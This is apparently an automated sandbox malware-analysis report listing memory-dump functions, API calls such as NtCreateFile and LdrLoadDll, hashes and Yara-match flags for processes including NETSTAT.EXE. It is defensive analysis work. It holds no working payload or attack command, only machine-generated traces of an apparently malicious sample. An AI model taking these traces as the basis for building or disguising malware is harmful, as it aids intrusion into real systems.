                                        • Instruction Fuzzy Hash: 0690027620100403D30061595508B070045D7D0341F51D479A0414598DD6968861B161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00BB9670, Relevance: .0, Instructions: 2COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction ID: 487184c4eede38b97deeca628c3cb9a0c26a1d92e5f2a5a4edbc361baaddb6f5
                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00C0FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E00C0FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00BBCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00C05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00C05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                        0x00c0fdda
                                        0x00c0fde2
                                        0x00c0fde5
                                        0x00c0fdec
                                        0x00c0fdfa
                                        0x00c0fdff
                                        0x00c0fe0a
                                        0x00c0fe0f
                                        0x00c0fe17
                                        0x00c0fe1e
                                        0x00c0fe19
                                        0x00c0fe19
                                        0x00c0fe19
                                        0x00c0fe20
                                        0x00c0fe21
                                        0x00c0fe22
                                        0x00c0fe25
                                        0x00c0fe40

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C0FDFA
                                        Strings
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00C0FE2B
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00C0FE01
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.689420437.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: true
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        • Opcode ID: dca12d61bf5785b9ebb266b4fded0c357bc261c144d157476db3efb1c99e0147
                                        • Instruction ID: 91e2e4db2d02aa02450c733713ecacfad88a33374cf64d539570093971e100de
                                        • Opcode Fuzzy Hash: dca12d61bf5785b9ebb266b4fded0c357bc261c144d157476db3efb1c99e0147
                                        • Instruction Fuzzy Hash: D8F0F632200601BFE6241A45DC06F23BF9AEB44730F240354F728565E1DA62F860E6F0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Analysis Process: NETSTAT.EXE PID: 2628 Parent PID: 3424 NETSTAT.EXECOMMON

                                        Executed Functions

                                        Function 00D69D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00D64B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00D64B87,007A002E,00000000,00000060,00000000,00000000), ref: 00D69DAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        • Opcode ID: 5b23cc0904b497842cd0003e4a4f704013445eb828d421d4b20b8764db977610
                                        • Instruction ID: 15480ec5da62e03ea95e25325d388d5752360f858de8598fe381857b6a79dcd4
                                        • Opcode Fuzzy Hash: 5b23cc0904b497842cd0003e4a4f704013445eb828d421d4b20b8764db977610
                                        • Instruction Fuzzy Hash: 20F01DB2204149ABCB05CF98D884CEB77A9FF8C314B15964DF95DA3202D630E851CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D69D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00D64B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00D64B87,007A002E,00000000,00000060,00000000,00000000), ref: 00D69DAD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: .z`
                                        • API String ID: 823142352-1441809116
                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                        • Instruction ID: d9d24b389977cfbd00039ad388a3f04531c64efddbcf0562f3d1ed6d146102bf
                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                        • Instruction Fuzzy Hash: 3DF0B6B2200108ABCB08CF88DC85DEB77ADEF8C754F158248FA0D97241C630E8118BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D69DB4, Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtReadFile.NTDLL(00D64D42,5EB6522D,FFFFFFFF,00D64A01,?,?,00D64D42,?,00D64A01,FFFFFFFF,5EB6522D,00D64D42,?,00000000), ref: 00D69E55
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 3db122ec7bc5b8fd79f9909e19fd8f4e8a6ab8875d423f8fe2bd8b40f78b68ac
                                        • Instruction ID: b75e78667280951e21402da8ce5222eb96e4f8bb3050a3f4744e67ef4bc841bd
                                        • Opcode Fuzzy Hash: 3db122ec7bc5b8fd79f9909e19fd8f4e8a6ab8875d423f8fe2bd8b40f78b68ac
                                        • Instruction Fuzzy Hash: A111C6B6204108AFDB14DF99DC91DEB77A9EF8C754F158249FA5CE7251C630E8118BB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D69E0A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtReadFile.NTDLL(00D64D42,5EB6522D,FFFFFFFF,00D64A01,?,?,00D64D42,?,00D64A01,FFFFFFFF,5EB6522D,00D64D42,?,00000000), ref: 00D69E55
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 075e34923006c968d6b2e98b6795854ea0c5df99f4c01fe7c7af88c6489e9885
                                        • Instruction ID: 2b45ebd3a5580f56279d8524c7a6d63b31a7ece3b09972d71c27cd6cf6205805
                                        • Opcode Fuzzy Hash: 075e34923006c968d6b2e98b6795854ea0c5df99f4c01fe7c7af88c6489e9885
                                        • Instruction Fuzzy Hash: 49F0E7B2200108AFCB14CF89CC84EEB77ADEF8C314F118259FA5DA7241C630E851CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D69E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtReadFile.NTDLL(00D64D42,5EB6522D,FFFFFFFF,00D64A01,?,?,00D64D42,?,00D64A01,FFFFFFFF,5EB6522D,00D64D42,?,00000000), ref: 00D69E55
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                        • Instruction ID: fffd29b71d3c12411ffd7e5bdfcd83f6ea009d19a3e423b664718d0851f47b89
                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                        • Instruction Fuzzy Hash: 66F0A4B2200208ABDB14DF89DC81EEB77ADEF8C754F158249BA5DA7241D630E8118BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D69F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00D52D11,00002000,00003000,00000004), ref: 00D69F79
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                        • Instruction ID: f255b8ff312d95bee62f2ab6b091ada3ee587199821eb9b71a6f6f2ae3f152e3
                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                        • Instruction Fuzzy Hash: 3FF015B2200208ABDB14DF89CC81EAB77ADEF88750F118149FE48A7241C630F810CBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D69E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtClose.NTDLL(00D64D20,?,?,00D64D20,00000000,FFFFFFFF), ref: 00D69EB5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                        • Instruction ID: 5a286b39098ac52b06fb60af99806a0ae77e89164fb1faa5f8e6efe4cdf06b32
                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                        • Instruction Fuzzy Hash: 8BD012752402146BD710EB98CC85E97775CEF44750F154455BA586B242C530F5008AE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3d7c4748767a6ac49ddb12588046347823fe2aa9dd5293db87bf50612ec74278
                                        • Instruction ID: f369f0f3b8abcbbd184cc9e6cb34e6ed3b612900ffbc53861789914da57997a3
                                        • Opcode Fuzzy Hash: 3d7c4748767a6ac49ddb12588046347823fe2aa9dd5293db87bf50612ec74278
                                        • Instruction Fuzzy Hash: FC90026121184553D240A9A94C24B470015D7D0343F51C165A1248674CCA5598696561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: c2a0538a93c184b0613239fedfa47ebcf835f9ffbd92714c10522f78e59a59cf
                                        • Instruction ID: f9a0e95d94a0a01dcd4ba24fe9cd185ca368aeaa3d9a592a2f2987db87027b89
                                        • Opcode Fuzzy Hash: c2a0538a93c184b0613239fedfa47ebcf835f9ffbd92714c10522f78e59a59cf
                                        • Instruction Fuzzy Hash: A79002A134104953D140A5994424B460015D7E1341F51C065E2158674DC759DC5A7166
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 02ae52764c257d6f761cce23e743b0acbadace761e848b54df205b6fee175ccf
                                        • Instruction ID: 01908242659686b0c6457e9ec3147c072490bd5fb8968cb98f0c51266708b925
                                        • Opcode Fuzzy Hash: 02ae52764c257d6f761cce23e743b0acbadace761e848b54df205b6fee175ccf
                                        • Instruction Fuzzy Hash: 2D9002B120104913D180B59944147860015D7D0341F51C061A6158674EC7999DDD76A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: ed0d25e7179d8fdfd692de4574b0eab7f767b41ee84ac28e89afb64343ea4a39
                                        • Instruction ID: 1f31c3d149309da4c08081127af4dd50212af6a1d438a9a8b759a44f6c9caa86
                                        • Opcode Fuzzy Hash: ed0d25e7179d8fdfd692de4574b0eab7f767b41ee84ac28e89afb64343ea4a39
                                        • Instruction Fuzzy Hash: 90900261242086639585F59944145474016E7E0281791C062A2508A70CC666A85EE661
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: d5a420460f2fb1c151ea146c15d49567a897f5cb9a04fce99948071656213a09
                                        • Instruction ID: e0f53975461158c049abd77d3d11f773fb302731867646fecbbd79ab8f6bb3df
                                        • Opcode Fuzzy Hash: d5a420460f2fb1c151ea146c15d49567a897f5cb9a04fce99948071656213a09
                                        • Instruction Fuzzy Hash: 6790027120104923D151A59945147470019D7D0281F91C462A1518678DD796995AB161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 933d22cb60d7b467397588c66649740169b08c9221a5968d792b9a9ab1dc43cb
                                        • Instruction ID: b8d8572c139973f19cce58cd5c547d3b19cbaf722d99e452b3daa0b8f0e81de2
                                        • Opcode Fuzzy Hash: 933d22cb60d7b467397588c66649740169b08c9221a5968d792b9a9ab1dc43cb
                                        • Instruction Fuzzy Hash: 4B90026921304513D1C0B599541864A0015D7D1242F91D465A1109678CCA55986D6361
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 4ce14a16a8a024783135b1f902e191c5ced73721073716a8413abab4a31a6b22
                                        • Instruction ID: 963fa82149e2ad9ed0c41913b3e37558d12a794b1ef45a799d86dd5265020ada
                                        • Opcode Fuzzy Hash: 4ce14a16a8a024783135b1f902e191c5ced73721073716a8413abab4a31a6b22
                                        • Instruction Fuzzy Hash: F290027131118913D150A59984147460015D7D1241F51C461A1918678DC7D598997162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 5c5dced871d6717c989797675cf82eabe3bedd3cc78831e4ef0ca916a153d651
                                        • Instruction ID: a29db3af1e67d0090301b971e7346f1dcaf03f0a3d2ced0486b3708762de8655
                                        • Opcode Fuzzy Hash: 5c5dced871d6717c989797675cf82eabe3bedd3cc78831e4ef0ca916a153d651
                                        • Instruction Fuzzy Hash: 4C90027120104913D140A9D954186860015D7E0341F51D061A6118675EC7A598997171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 3b45cf431b40c094419ad98cdf91ceef5fef3963a5b8cc439f4c7fa85d8f4b5e
                                        • Instruction ID: 4c57bfb5ce3644b966c2e2cfb336ce39de9aee7fef2b0c3c85098483b6d40ae5
                                        • Opcode Fuzzy Hash: 3b45cf431b40c094419ad98cdf91ceef5fef3963a5b8cc439f4c7fa85d8f4b5e
                                        • Instruction Fuzzy Hash: A690027120104D53D140A5994414B860015D7E0341F51C066A1218774DC755D8597561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 1fa8c5528611977f81c69929cb30e13d8f42a62f4b174b1b696b0bd1ec679128
                                        • Instruction ID: 249265c4c240eb911a0cc1c29ae9d6c4a61d3c84c56c7fea1e814ae23d178019
                                        • Opcode Fuzzy Hash: 1fa8c5528611977f81c69929cb30e13d8f42a62f4b174b1b696b0bd1ec679128
                                        • Instruction Fuzzy Hash: E59002712010CD13D150A599841478A0015D7D0341F55C461A5518778DC7D598997161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 6a67b8e336cec366fc4c47693612b5596330525094caa88c25ec3dd05344d534
                                        • Instruction ID: 68f7c10e30862ba2404d770a5342fe734a4838ed301b2811fd90a830115a1ffa
                                        • Opcode Fuzzy Hash: 6a67b8e336cec366fc4c47693612b5596330525094caa88c25ec3dd05344d534
                                        • Instruction Fuzzy Hash: F690027120508D53D180B5994414A860025D7D0345F51C061A11587B4DD7659D5DB6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: ead532bd44fcdd0600a27f7e6a7149a8cc6171ba7bb33831cc4e545f726fc803
                                        • Instruction ID: 581b615f4b2666b95767b642210f016d59551d759eaef02d4d65be7b07ac6bc0
                                        • Opcode Fuzzy Hash: ead532bd44fcdd0600a27f7e6a7149a8cc6171ba7bb33831cc4e545f726fc803
                                        • Instruction Fuzzy Hash: 3F90027120104D13D1C0B599441468A0015D7D1341F91C065A1119774DCB559A5D77E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 7403f2acc01ffc903747f9ad7c4c0f66e784e99171c38e606e70ab9631e75841
                                        • Instruction ID: e5a3c7d68842e3fbf6c15b5354605de81b5d19ea73d82a5c9b9f7c023f605180
                                        • Opcode Fuzzy Hash: 7403f2acc01ffc903747f9ad7c4c0f66e784e99171c38e606e70ab9631e75841
                                        • Instruction Fuzzy Hash: 7C9002A1202045138145B5994424656401AD7E0241B51C071E21086B0DC66598997165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 51067d29f6a02725b6f10a46f71d2e067cee78a8e05faa8165a8f2b4302ef367
                                        • Instruction ID: efec66e0f4f3ac154541c43b95743379dc0090ee81ebf483a1959da16c5f1cdf
                                        • Opcode Fuzzy Hash: 51067d29f6a02725b6f10a46f71d2e067cee78a8e05faa8165a8f2b4302ef367
                                        • Instruction Fuzzy Hash: F4900265211045134145E99907145470056D7D5391351C071F2109670CD76198696161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D6A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00D53AF8), ref: 00D6A09D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction ID: 8590a9281bb37ae7a434dd84bab428fe3c8307f1961cea228e528dec5b50d9b3
                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                        • Instruction Fuzzy Hash: AFE04FB12002086BD714DF59CC45EA777ACEF88750F118555FD4867241C630F910CAF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D6A072, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00D53AF8), ref: 00D6A09D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: .z`
                                        • API String ID: 3298025750-1441809116
                                        • Opcode ID: e61b948e272a93d700dcc5693ed88935c755ca68bc51f91936351e5491873ea1
                                        • Instruction ID: bc73a3b3cafd84156b33b92d056509054520d2e9c69dae533bc85d85d83d00fb
                                        • Opcode Fuzzy Hash: e61b948e272a93d700dcc5693ed88935c755ca68bc51f91936351e5491873ea1
                                        • Instruction Fuzzy Hash: 1CE046B1200204AFDB18DF68CC88EE73768EF88350F118659F94CAB241C631E910CAB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D582F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00D5834A
                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00D5836B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                        • Instruction ID: 9c2c84074f75386f05a63094c36308a7609cf7a243678859b4fc0968d57f0110
                                        • Opcode Fuzzy Hash: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                        • Instruction Fuzzy Hash: C601A731A802287BEB20A6999C43FBE776CAB40F51F044115FF04FA1C1EAD4790A46F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D5ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00D5AD42
                                        Memory Dump Source
